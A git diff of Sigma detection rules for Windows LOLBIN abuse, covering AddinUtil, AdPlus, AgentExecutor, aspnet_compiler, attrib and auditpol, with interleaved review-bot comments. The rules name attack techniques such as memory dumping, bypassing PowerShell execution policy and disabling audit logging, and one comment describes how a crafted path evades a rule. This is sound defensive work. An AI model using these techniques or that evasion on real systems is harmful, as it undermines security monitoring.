a/sigma/builtin/process_creation/proc_creation_win_addinutil_suspicious_cmdline.yml b/sigma/builtin/process_creation/proc_creation_win_addinutil_suspicious_cmdline.yml index cdde24563..3341d7831 100644 --- a/sigma/builtin/process_creation/proc_creation_win_addinutil_suspicious_cmdline.yml +++ b/sigma/builtin/process_creation/proc_creation_win_addinutil_suspicious_cmdline.yml 
@@ -1,16 +1,11 @@ title: Suspicious AddinUtil.EXE CommandLine Execution id: 631b22a4-70f4-4e2f-9ea8-42f84d9df6d8 status: experimental -description: 'Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) - with suspicious Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe - with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store - payload. - - ' +description: | + Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with suspicious Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload. references: - https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html -author: Nasreddine Bencherchali (Nextron Systems), Michael McKinley (@McKinleyMike), - Tony Latteri (@TheLatteri) +author: Nasreddine Bencherchali (Nextron Systems), Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri) date: 2023/09/18 tags: - attack.defense_evasion @@ -23,21 +18,21 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \addinutil.exe - - OriginalFileName: AddInUtil.exe + - NewProcessName|endswith: \addinutil.exe + - OriginalFileName: AddInUtil.exe selection_susp_1_flags: - CommandLine|contains: + CommandLine|contains: - '-AddInRoot:' - '-PipelineRoot:' selection_susp_1_paths: - CommandLine|contains: + CommandLine|contains: - \AppData\Local\Temp\ - \Desktop\ - \Downloads\ - \Users\Public\ - \Windows\Temp\ selection_susp_2: - CommandLine|contains: + CommandLine|contains: - -AddInRoot:. - -AddInRoot:"." - -PipelineRoot:. 
@@ -48,8 +43,7 @@ detection: - \Downloads\ - \Users\Public\ - \Windows\Temp\ - condition: process_creation and (selection_img and (all of selection_susp_1_* - or selection_susp_2)) + condition: process_creation and (selection_img and (all of selection_susp_1_* or selection_susp_2)) falsepositives: - Unknown level: high diff --git a/sigma/builtin/process_creation/proc_creation_win_addinutil_uncommon_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_addinutil_uncommon_child_process.yml index 472e37d8c..dab4613a7 100644 --- a/sigma/builtin/process_creation/proc_creation_win_addinutil_uncommon_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_addinutil_uncommon_child_process.yml @@ -1,11 +1,8 @@ title: Uncommon Child Process Of AddinUtil.EXE id: b5746143-59d6-4603-8d06-acbd60e166ee status: experimental -description: 'Detects uncommon child processes of the Add-In deployment cache updating - utility (AddInutil.exe) which could be a sign of potential abuse of the binary - to proxy execution via a custom Addins.Store payload. - - ' +description: | + Detects uncommon child processes of the Add-In deployment cache updating utility (AddInutil.exe) which could be a sign of potential abuse of the binary to proxy execution via a custom Addins.Store payload. references: - https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri) @@ -23,7 +20,7 @@ detection: selection: ParentProcessName|endswith: \addinutil.exe filter_main_werfault: - NewProcessName|endswith: + NewProcessName|endswith: - :\Windows\System32\conhost.exe - :\Windows\System32\werfault.exe - :\Windows\SysWOW64\werfault.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_addinutil_uncommon_cmdline.yml b/sigma/builtin/process_creation/proc_creation_win_addinutil_uncommon_cmdline.yml index a95cd947c..1389e206f 100644 
--- a/sigma/builtin/process_creation/proc_creation_win_addinutil_uncommon_cmdline.yml +++ b/sigma/builtin/process_creation/proc_creation_win_addinutil_uncommon_cmdline.yml @@ -1,12 +1,8 @@ title: Uncommon AddinUtil.EXE CommandLine Execution id: 4f2cd9b6-4a17-440f-bb2a-687abb65993a status: experimental -description: 'Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) - with uncommon Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe - with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store - payload. - - ' +description: | + Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with uncommon Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload. references: - https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri) @@ -22,14 +18,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \addinutil.exe - - OriginalFileName: AddInUtil.exe + - NewProcessName|endswith: \addinutil.exe + - OriginalFileName: AddInUtil.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - '-AddInRoot:' - '-PipelineRoot:' filter_main_addinroot: - CommandLine|contains: + CommandLine|contains: - -AddInRoot:"C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA - -AddInRoot:C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA - -PipelineRoot:"C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA diff --git a/sigma/builtin/process_creation/proc_creation_win_addinutil_uncommon_dir_exec.yml b/sigma/builtin/process_creation/proc_creation_win_addinutil_uncommon_dir_exec.yml index 68bceba03..9ad833313 100644 --- a/sigma/builtin/process_creation/proc_creation_win_addinutil_uncommon_dir_exec.yml 
+++ b/sigma/builtin/process_creation/proc_creation_win_addinutil_uncommon_dir_exec.yml @@ -1,8 +1,7 @@ title: AddinUtil.EXE Execution From Uncommon Directory id: 6120ac2a-a34b-42c0-a9bd-1fb9f459f348 status: experimental -description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) - from a non-standard directory. +description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) from a non-standard directory. references: - https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri) @@ -18,10 +17,10 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \addinutil.exe - - OriginalFileName: AddInUtil.exe + - NewProcessName|endswith: \addinutil.exe + - OriginalFileName: AddInUtil.exe filter_main_legit_location: - NewProcessName|contains: + NewProcessName|contains: - :\Windows\Microsoft.NET\Framework\ - :\Windows\Microsoft.NET\Framework64\ - :\Windows\WinSxS\ diff --git a/sigma/builtin/process_creation/proc_creation_win_adplus_memory_dump.yml b/sigma/builtin/process_creation/proc_creation_win_adplus_memory_dump.yml index 7c4da1683..d0379932a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_adplus_memory_dump.yml +++ b/sigma/builtin/process_creation/proc_creation_win_adplus_memory_dump.yml 
@@ -1,9 +1,7 @@ title: Potential Adplus.EXE Abuse id: 2f869d59-7f6a-4931-992c-cce556ff2d53 status: experimental -description: Detects execution of "AdPlus.exe", a binary that is part of the Windows - SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary - commands. +description: Detects execution of "AdPlus.exe", a binary that is part of the Windows SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary commands. references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/ - https://twitter.com/nas_bench/status/1534916659676422152 @@ -23,16 +21,19 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \adplus.exe - - OriginalFileName: Adplus.exe + - NewProcessName|endswith: \adplus.exe + - OriginalFileName: Adplus.exe selection_cli: - CommandLine|contains: + CommandLine|contains: + # Dump process memory - ' -hang ' - ' -pn ' - ' -pmn ' - ' -p ' - ' -po ' + # Using a config file - ' -c ' + # Execute commands inline - ' -sc ' condition: process_creation and (all of selection_*) falsepositives: diff --git a/sigma/builtin/process_creation/proc_creation_win_agentexecutor_potential_abuse.yml b/sigma/builtin/process_creation/proc_creation_win_agentexecutor_potential_abuse.yml index 3d9268e64..3d680663d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_agentexecutor_potential_abuse.yml +++ b/sigma/builtin/process_creation/proc_creation_win_agentexecutor_potential_abuse.yml 
@@ -1,13 +1,10 @@ title: AgentExecutor PowerShell Execution id: 7efd2c8d-8b18-45b7-947d-adfe9ed04f61 related: - - id: c0b40568-b1e9-4b03-8d6c-b096da6da9ab - type: similar + - id: c0b40568-b1e9-4b03-8d6c-b096da6da9ab + type: similar status: test -description: Detects execution of the AgentExecutor.exe binary. Which can be abused - as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or - any binary named "powershell.exe" located in the path provided by 6th positional - argument +description: Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th positional argument author: Nasreddine Bencherchali (Nextron Systems), memory-shards references: - https://twitter.com/lefterispan/status/1286259016436514816 
@@ -26,15 +23,22 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName: \AgentExecutor.exe - - OriginalFileName: AgentExecutor.exe + - NewProcessName: \AgentExecutor.exe + - OriginalFileName: AgentExecutor.exe selection_cli: - CommandLine|contains: - - ' -powershell' + # Example: + # AgentExecutor.exe -powershell [scriptPath] [outputFilePath] [errorFilePath] [timeoutFilePath] [timeoutSeconds] [powershellPath] [enforceSignatureCheck] [runAs32BitOn64] + # Note: + # - If [timeoutSeconds] is NULL then it defaults to 60000 + # - If [enforceSignatureCheck] is: + # - "NULL" or "1" then a PowerShell instance is spawned with the args: "-NoProfile -executionPolicy allsigned -file " + # - Else a PowerShell instance is spawned with the args: "-NoProfile -executionPolicy bypass -file " + # - [powershellPath] is always concatendated to "powershell.exe" + CommandLine|contains: + - ' -powershell' # Also covers the "-powershellDetection" flag - ' -remediationScript' condition: process_creation and (all of selection_*) falsepositives: - - Legitimate use via Intune management. You exclude script paths and names to - reduce FP rate + - Legitimate use via Intune management. You exclude script paths and names to reduce FP rate level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_agentexecutor_susp_usage.yml b/sigma/builtin/process_creation/proc_creation_win_agentexecutor_susp_usage.yml index ba6dde1f2..d1f3e8881 100644 --- a/sigma/builtin/process_creation/proc_creation_win_agentexecutor_susp_usage.yml +++ b/sigma/builtin/process_creation/proc_creation_win_agentexecutor_susp_usage.yml 
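Review bot: In selection_img the re-indented line `NewProcessName: \AgentExecutor.exe` is an exact-equality match, so it only matches a process name that is literally `\AgentExecutor.exe` and never a full path; in practice only the OriginalFileName alternative can fire, and a copy with a stripped version resource is missed. The sibling rule c0b40568 in this same patch uses `NewProcessName|endswith: \AgentExecutor.exe`; change this line to `- NewProcessName|endswith: \AgentExecutor.exe`. The new comment block also has a typo, `concatendated` → `concatenated`.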
@@ -1,13 +1,10 @@ title: Suspicious AgentExecutor PowerShell Execution id: c0b40568-b1e9-4b03-8d6c-b096da6da9ab related: - - id: 7efd2c8d-8b18-45b7-947d-adfe9ed04f61 - type: similar + - id: 7efd2c8d-8b18-45b7-947d-adfe9ed04f61 + type: similar status: test -description: Detects execution of the AgentExecutor.exe binary. Which can be abused - as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or - any binary named "powershell.exe" located in the path provided by 6th positional - argument +description: Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th positional argument author: Nasreddine Bencherchali (Nextron Systems), memory-shards references: - https://twitter.com/lefterispan/status/1286259016436514816 
@@ -26,14 +23,22 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \AgentExecutor.exe - - OriginalFileName: AgentExecutor.exe + - NewProcessName|endswith: \AgentExecutor.exe + - OriginalFileName: AgentExecutor.exe selection_cli: - CommandLine|contains: - - ' -powershell' + # Example: + # AgentExecutor.exe -powershell [scriptPath] [outputFilePath] [errorFilePath] [timeoutFilePath] [timeoutSeconds] [powershellPath] [enforceSignatureCheck] [runAs32BitOn64] + # Note: + # - If [timeoutSeconds] is NULL then it defaults to 60000 + # - If [enforceSignatureCheck] is: + # - "NULL" or "1" then a PowerShell instance is spawned with the args: "-NoProfile -executionPolicy allsigned -file " + # - Else a PowerShell instance is spawned with the args: "-NoProfile -executionPolicy bypass -file " + # - [powershellPath] is always concatendated to "powershell.exe" + CommandLine|contains: + - ' -powershell' # Also covers the "-powershellDetection" flag - ' -remediationScript' filter_main_pwsh: - CommandLine|contains: + CommandLine|contains: - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ - C:\Windows\System32\WindowsPowerShell\v1.0\ condition: process_creation and (all of selection_* and not 1 of filter_main_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_appvlp_uncommon_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_appvlp_uncommon_child_process.yml index efa14d313..1b069c6cd 100644 --- a/sigma/builtin/process_creation/proc_creation_win_appvlp_uncommon_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_appvlp_uncommon_child_process.yml 
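Review bot: filter_main_pwsh is a substring match over the whole command line, so any positional argument — e.g. the [outputFilePath] or [timeoutFilePath] documented in the new comment block — that contains `C:\Windows\System32\WindowsPowerShell\v1.0\` suppresses the alert, not only a legitimate [powershellPath]. That is a plausible evasion; at minimum record it next to the filter: `# Note: matches anywhere in the command line; a crafted output/timeout path containing the system PowerShell directory would evade this rule`. The filter also hard-codes `C:` while other rules in this patch use drive-agnostic `:\Windows\...` prefixes. The comment block has a typo, `concatendated` → `concatenated`.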
@@ -1,17 +1,11 @@ title: Uncommon Child Process Of Appvlp.EXE id: 9c7e131a-0f2c-4ae0-9d43-b04f4e266d43 status: test -description: 'Detects uncommon child processes of Appvlp.EXE - - Appvlp or the Application Virtualization Utility is included with Microsoft Office. - Attackers are able to abuse "AppVLP" to execute shell commands. - - Normally, this binary is used for Application Virtualization, but it can also - be abused to circumvent the ASR file path rule folder - +description: | + Detects uncommon child processes of Appvlp.EXE + Appvlp or the Application Virtualization Utility is included with Microsoft Office. Attackers are able to abuse "AppVLP" to execute shell commands. + Normally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder or to mark a file as a system file. - - ' references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Appvlp/ author: Sreeman 
@@ -31,22 +25,21 @@ detection: selection: ParentProcessName|endswith: \appvlp.exe filter_main_generic: - NewProcessName|endswith: + NewProcessName|endswith: - :\Windows\SysWOW64\rundll32.exe - :\Windows\System32\rundll32.exe filter_optional_office_msoasb: - NewProcessName|contains: :\Program Files\Microsoft Office - NewProcessName|endswith: \msoasb.exe + NewProcessName|contains: :\Program Files\Microsoft Office + NewProcessName|endswith: \msoasb.exe filter_optional_office_skype: - NewProcessName|contains|all: + NewProcessName|contains|all: - :\Program Files\Microsoft Office - \SkypeSrv\ - NewProcessName|endswith: \SKYPESERVER.EXE + NewProcessName|endswith: \SKYPESERVER.EXE filter_optional_office_msouc: - NewProcessName|contains: :\Program Files\Microsoft Office - NewProcessName|endswith: \MSOUC.EXE - condition: process_creation and (selection and not 1 of filter_main_* and not - 1 of filter_optional_*) + NewProcessName|contains: :\Program Files\Microsoft Office + NewProcessName|endswith: \MSOUC.EXE + condition: process_creation and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unknown level: medium diff --git a/sigma/builtin/process_creation/proc_creation_win_aspnet_compiler_exectuion.yml b/sigma/builtin/process_creation/proc_creation_win_aspnet_compiler_exectuion.yml index c1a877bfc..0736c60c8 100644 --- a/sigma/builtin/process_creation/proc_creation_win_aspnet_compiler_exectuion.yml +++ b/sigma/builtin/process_creation/proc_creation_win_aspnet_compiler_exectuion.yml 
@@ -1,15 +1,14 @@ title: AspNetCompiler Execution -id: a01b8329-5953-4f73-ae2d-aa01e1f35f00 +id: a01b8329-5953-4f73-ae2d-aa01e1f35f00 # Exec related: - - id: 9ccba514-7cb6-4c5c-b377-700758f2f120 - type: similar - - id: 4c7f49ee-2638-43bb-b85b-ce676c30b260 - type: similar - - id: 9f50fe98-fe5c-4a2d-86c7-fad7f63ed622 - type: similar + - id: 9ccba514-7cb6-4c5c-b377-700758f2f120 # SuspChild + type: similar + - id: 4c7f49ee-2638-43bb-b85b-ce676c30b260 # TMP File + type: similar + - id: 9f50fe98-fe5c-4a2d-86c7-fad7f63ed622 # Susp Paths + type: similar status: test -description: Detects execution of "aspnet_compiler.exe" which can be abused to compile - and execute C# code. +description: Detects execution of "aspnet_compiler.exe" which can be abused to compile and execute C# code. references: - https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/ - https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ @@ -27,10 +26,10 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|contains: + NewProcessName|contains: - C:\Windows\Microsoft.NET\Framework\ - C:\Windows\Microsoft.NET\Framework64\ - NewProcessName|endswith: \aspnet_compiler.exe + NewProcessName|endswith: \aspnet_compiler.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_aspnet_compiler_susp_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_aspnet_compiler_susp_child_process.yml index 4f368439e..b8fe47a69 100644 --- a/sigma/builtin/process_creation/proc_creation_win_aspnet_compiler_susp_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_aspnet_compiler_susp_child_process.yml 
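Review bot: The selection's `NewProcessName|contains` pins the drive letter with `C:\Windows\Microsoft.NET\Framework\` and `C:\Windows\Microsoft.NET\Framework64\`, so an aspnet_compiler.exe on a system installed to another drive is not covered, whereas the addinutil and appvlp rules in this same patch use drive-agnostic `:\Windows\...` prefixes. Consider `- :\Windows\Microsoft.NET\Framework\` and `- :\Windows\Microsoft.NET\Framework64\` here for consistency; the related susp_paths rule (9f50fe98) uses the same literals and would need the same change.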
@@ -1,12 +1,12 @@ title: Suspicious Child Process of AspNetCompiler -id: 9ccba514-7cb6-4c5c-b377-700758f2f120 +id: 9ccba514-7cb6-4c5c-b377-700758f2f120 # SuspChild related: - - id: 4c7f49ee-2638-43bb-b85b-ce676c30b260 - type: similar - - id: 9f50fe98-fe5c-4a2d-86c7-fad7f63ed622 - type: similar - - id: a01b8329-5953-4f73-ae2d-aa01e1f35f00 - type: similar + - id: 4c7f49ee-2638-43bb-b85b-ce676c30b260 # TMP File + type: similar + - id: 9f50fe98-fe5c-4a2d-86c7-fad7f63ed622 # Susp Paths + type: similar + - id: a01b8329-5953-4f73-ae2d-aa01e1f35f00 # Exec + type: similar status: experimental description: Detects potentially suspicious child processes of "aspnet_compiler.exe". references: @@ -27,17 +27,18 @@ detection: selection_parent: ParentProcessName|endswith: \aspnet_compiler.exe selection_child: - - NewProcessName|endswith: - - \calc.exe - - \notepad.exe - - NewProcessName|contains: - - \Users\Public\ - - \AppData\Local\Temp\ - - \AppData\Local\Roaming\ - - :\Temp\ - - :\Windows\Temp\ - - :\Windows\System32\Tasks\ - - :\Windows\Tasks\ + # Note: add other potential suspicious child processes and paths + - NewProcessName|endswith: + - \calc.exe + - \notepad.exe + - NewProcessName|contains: + - \Users\Public\ + - \AppData\Local\Temp\ + - \AppData\Local\Roaming\ + - :\Temp\ + - :\Windows\Temp\ + - :\Windows\System32\Tasks\ + - :\Windows\Tasks\ condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_aspnet_compiler_susp_paths.yml b/sigma/builtin/process_creation/proc_creation_win_aspnet_compiler_susp_paths.yml index 413d4ab8c..f2019f226 100644 --- a/sigma/builtin/process_creation/proc_creation_win_aspnet_compiler_susp_paths.yml +++ b/sigma/builtin/process_creation/proc_creation_win_aspnet_compiler_susp_paths.yml 
@@ -1,15 +1,14 @@ title: Potentially Suspicious ASP.NET Compilation Via AspNetCompiler -id: 9f50fe98-fe5c-4a2d-86c7-fad7f63ed622 +id: 9f50fe98-fe5c-4a2d-86c7-fad7f63ed622 # Susp Paths related: - - id: 9ccba514-7cb6-4c5c-b377-700758f2f120 - type: similar - - id: 4c7f49ee-2638-43bb-b85b-ce676c30b260 - type: similar - - id: a01b8329-5953-4f73-ae2d-aa01e1f35f00 - type: similar + - id: 9ccba514-7cb6-4c5c-b377-700758f2f120 # SuspChild + type: similar + - id: 4c7f49ee-2638-43bb-b85b-ce676c30b260 # TMP File + type: similar + - id: a01b8329-5953-4f73-ae2d-aa01e1f35f00 # Exec + type: similar status: experimental -description: Detects execution of "aspnet_compiler.exe" with potentially suspicious - paths for compilation. +description: Detects execution of "aspnet_compiler.exe" with potentially suspicious paths for compilation. references: - https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/ - https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ @@ -26,7 +25,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: + # Note: add other potential suspicious paths - \Users\Public\ - \AppData\Local\Temp\ - \AppData\Local\Roaming\ @@ -34,10 +34,10 @@ detection: - :\Windows\Temp\ - :\Windows\System32\Tasks\ - :\Windows\Tasks\ - NewProcessName|contains: + NewProcessName|contains: - C:\Windows\Microsoft.NET\Framework\ - C:\Windows\Microsoft.NET\Framework64\ - NewProcessName|endswith: \aspnet_compiler.exe + NewProcessName|endswith: \aspnet_compiler.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_at_interactive_execution.yml b/sigma/builtin/process_creation/proc_creation_win_at_interactive_execution.yml index d1df05f01..55028f48d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_at_interactive_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_at_interactive_execution.yml 
@@ -1,8 +1,7 @@ title: Interactive AT Job id: 60fc936d-2eb0-4543-8a13-911c750a1dfc status: test -description: Detects an interactive AT job, which may be used as a form of privilege - escalation. +description: Detects an interactive AT job, which may be used as a form of privilege escalation. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md - https://eqllib.readthedocs.io/en/latest/analytics/d8db43cf-ed52-4f5c-9fb3-c9a4b95a0b56.html @@ -20,8 +19,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: interactive - NewProcessName|endswith: \at.exe + CommandLine|contains: interactive + NewProcessName|endswith: \at.exe condition: process_creation and selection falsepositives: - Unlikely (at.exe deprecated as of Windows 8) diff --git a/sigma/builtin/process_creation/proc_creation_win_attrib_hiding_files.yml b/sigma/builtin/process_creation/proc_creation_win_attrib_hiding_files.yml index ec5a4d47d..06f7f39c2 100644 --- a/sigma/builtin/process_creation/proc_creation_win_attrib_hiding_files.yml +++ b/sigma/builtin/process_creation/proc_creation_win_attrib_hiding_files.yml 
@@ -19,20 +19,19 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \attrib.exe - - OriginalFileName: ATTRIB.EXE + - NewProcessName|endswith: \attrib.exe + - OriginalFileName: ATTRIB.EXE selection_cli: - CommandLine|contains: ' +h ' + CommandLine|contains: ' +h ' filter_msiexec: - CommandLine|contains: '\desktop.ini ' + CommandLine|contains: '\desktop.ini ' filter_intel: - CommandLine: +R +H +S +A \\\*.cui + CommandLine: +R +H +S +A \\\*.cui ParentCommandLine: C:\\WINDOWS\\system32\\\*.bat ParentProcessName|endswith: \cmd.exe condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - - IgfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of - cmd.exe and igfxCUIService.exe is the parent of the cmd.exe) + - IgfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of cmd.exe and igfxCUIService.exe is the parent of the cmd.exe) - Msiexec.exe hiding desktop.ini level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_attrib_system.yml b/sigma/builtin/process_creation/proc_creation_win_attrib_system.yml index 45977c794..a5b80ce1b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_attrib_system.yml +++ b/sigma/builtin/process_creation/proc_creation_win_attrib_system.yml 
@@ -1,11 +1,10 @@ title: Set Files as System Files Using Attrib.EXE id: bb19e94c-59ae-4c15-8c12-c563d23fe52b related: - - id: efec536f-72e8-4656-8960-5e85d091345b - type: similar + - id: efec536f-72e8-4656-8960-5e85d091345b + type: similar status: experimental -description: Detects the execution of "attrib" with the "+s" flag to mark files as - system files +description: Detects the execution of "attrib" with the "+s" flag to mark files as system files references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-3---create-windows-system-file-with-attrib - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/attrib @@ -24,10 +23,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \attrib.exe - - OriginalFileName: ATTRIB.EXE + - NewProcessName|endswith: \attrib.exe + - OriginalFileName: ATTRIB.EXE selection_cli: - CommandLine|contains: ' +s ' + CommandLine|contains: ' +s ' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_attrib_system_susp_paths.yml b/sigma/builtin/process_creation/proc_creation_win_attrib_system_susp_paths.yml index 84eab3c49..56c9e65fd 100644 --- a/sigma/builtin/process_creation/proc_creation_win_attrib_system_susp_paths.yml +++ b/sigma/builtin/process_creation/proc_creation_win_attrib_system_susp_paths.yml 
@@ -1,15 +1,11 @@ title: Set Suspicious Files as System Files Using Attrib.EXE id: efec536f-72e8-4656-8960-5e85d091345b related: - - id: bb19e94c-59ae-4c15-8c12-c563d23fe52b - type: derived + - id: bb19e94c-59ae-4c15-8c12-c563d23fe52b + type: derived status: experimental -description: 'Detects the usage of attrib with the "+s" option to set scripts or executables - located in suspicious locations as system files to hide them from users and make - them unable to be deleted with simple rights. The rule limits the search to specific - extensions and directories to avoid FPs - - ' +description: | + Detects the usage of attrib with the "+s" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs references: - https://app.any.run/tasks/c28cabc8-a19f-40f3-a78b-cae506a5c0d4 - https://app.any.run/tasks/cfc8870b-ccd7-4210-88cf-a8087476a6d0 @@ -28,20 +24,20 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \attrib.exe - - OriginalFileName: ATTRIB.EXE + - NewProcessName|endswith: \attrib.exe + - OriginalFileName: ATTRIB.EXE selection_cli: - CommandLine|contains: ' +s' + CommandLine|contains: ' +s' selection_paths: - CommandLine|contains: - - ' %' + CommandLine|contains: + - ' %' # Custom Environment variable - \Users\Public\ - \AppData\Local\ - \ProgramData\ - \Downloads\ - \Windows\Temp\ selection_ext: - CommandLine|contains: + CommandLine|contains: - .bat - .dll - .exe @@ -50,7 +46,7 @@ detection: - .vbe - .vbs filter: - CommandLine|contains|all: + CommandLine|contains|all: - \Windows\TEMP\ - .exe condition: process_creation and (all of selection* and not filter) 
diff --git a/sigma/builtin/process_creation/proc_creation_win_auditpol_nt_resource_kit_usage.yml b/sigma/builtin/process_creation/proc_creation_win_auditpol_nt_resource_kit_usage.yml index 90f35aa15..d18bf39aa 100644 --- a/sigma/builtin/process_creation/proc_creation_win_auditpol_nt_resource_kit_usage.yml +++ b/sigma/builtin/process_creation/proc_creation_win_auditpol_nt_resource_kit_usage.yml @@ -1,17 +1,12 @@ title: Audit Policy Tampering Via NT Resource Kit Auditpol id: c6c56ada-612b-42d1-9a29-adad3c5c2c1e related: - - id: 0a13e132-651d-11eb-ae93-0242ac130002 - type: similar + - id: 0a13e132-651d-11eb-ae93-0242ac130002 # New auditpol version + type: similar status: test -description: 'Threat actors can use an older version of the auditpol binary available - inside the NT resource kit to change audit policy configuration to impair detection - capability. - - This can be carried out by selectively disabling/removing certain audit policies - as well as restoring a custom policy owned by the threat actor. - - ' +description: | + Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability. + This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor. references: - https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Windows%202000%20Resource%20Kit%20Tools/AuditPol author: Nasreddine Bencherchali (Nextron Systems) @@ -28,7 +23,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - /logon:none - /system:none - /sam:none 
@@ -38,8 +33,6 @@ detection: - /policy:none condition: process_creation and selection falsepositives: - - The old auditpol utility isn't available by default on recent versions of Windows - as it was replaced by a newer version. The FP rate should be very low except - for tools that use a similar flag structure + - The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_auditpol_susp_execution.yml b/sigma/builtin/process_creation/proc_creation_win_auditpol_susp_execution.yml index 6c580900d..ef87f6a21 100644 --- a/sigma/builtin/process_creation/proc_creation_win_auditpol_susp_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_auditpol_susp_execution.yml @@ -1,16 +1,12 @@ title: Audit Policy Tampering Via Auditpol id: 0a13e132-651d-11eb-ae93-0242ac130002 related: - - id: c6c56ada-612b-42d1-9a29-adad3c5c2c1e - type: similar + - id: c6c56ada-612b-42d1-9a29-adad3c5c2c1e # Old auditpol + type: similar status: test -description: 'Threat actors can use auditpol binary to change audit policy configuration - to impair detection capability. - - This can be carried out by selectively disabling/removing certain audit policies - as well as restoring a custom policy owned by the threat actor. - - ' +description: | + Threat actors can use auditpol binary to change audit policy configuration to impair detection capability. + This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor. references: - 